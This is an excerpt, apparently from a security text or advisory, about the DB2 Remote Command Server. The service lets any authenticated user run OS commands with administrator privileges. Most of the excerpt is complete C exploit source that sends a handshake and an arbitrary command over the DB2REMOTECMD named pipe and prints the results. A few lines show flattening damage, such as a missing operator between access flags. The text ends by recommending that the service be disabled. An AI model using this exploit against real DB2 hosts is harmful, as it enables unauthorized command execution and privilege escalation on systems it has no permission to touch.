The DB2 Remote Command Server exists to ease administration of the DB2 server allowing users to run arbitrary commands on the remote server. Although the Remote Command Server was intended to allow administrators to run commands, commands can be run by any user, provided of course they have a user ID and password. While it is considered bad to allow everyone and their dog to run commands remotely, what exacerbates the problem is that the command runs with the privileges of the user account running the Remote Command Server. On Windows , for example, this is db2admin, which is an administrator. What this means is that a low-privileged guest account can run OS commands with administrator-level privileges.
/* DB2 Remote Command Server Exploit
DB2RCMD.EXE listens on a named pipe DB2REMOTECMD and executes commands sent through it. When a connection is made to the pipe a new process is created, namely db2rcmdc.exe, and this executes the command.
*/ #include <stdio.h> #include <windows.h> int main(int argc, char *argv[]) { char buffer[540]=""; char NamedPipe[260]="\\"; HANDLE rcmd=NULL; char *ptr = NULL; int len =0; DWORD Bytes = 0; if(argc !=3) { printf("\n\tDB2 Remote Command Exploit.\n\n"); printf("\tUsage: db2rmtcmd target \"command\"\n"); printf("\n\tDavid Litchfield\n\t(david@ngssoftware.com)\n\t6th September 2003\n"); return 0; } strncat(NamedPipe,argv[1],200); strcat(NamedPipe,"\pipe\DB2REMOTECMD"); // Setup handshake message ZeroMemory(buffer,540); buffer[0]=0x01; ptr = &buffer[4]; strcpy(ptr,"DB2"); len = strlen(argv[2]); buffer[532]=(char)len; // Open the named pipe rcmd = CreateFile(NamedPipe,GENERIC_WRITEGENERIC_READ,0,NULL,OPEN_EXISTING,0,NULL); if(rcmd == INVALID_HANDLE_VALUE) return printf("Failed to open pipe %s. Error %d.\n",NamedPipe,GetLastError()); // Send handshake len = WriteFile(rcmd,buffer,536,&Bytes,NULL); if(!len) return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError()); ZeroMemory(buffer,540); strncpy(buffer,argv[2],254); // Send command len = WriteFile(rcmd,buffer,strlen(buffer),&Bytes,NULL); if(!len) return printf("Failed to write to %s. Error %d.\n",NamedPipe,GetLastError()); // Read results while(len) { len = ReadFile(rcmd,buffer,530,&Bytes,NULL); printf("%s",buffer); ZeroMemory(buffer,540); } return 0; }
Allowing users to run commands remotely is dangerous, especially if they can run commands with administrator privileges. As such this feature should not be used. Turning off the Remote Command Server will help secure the DB2 installation.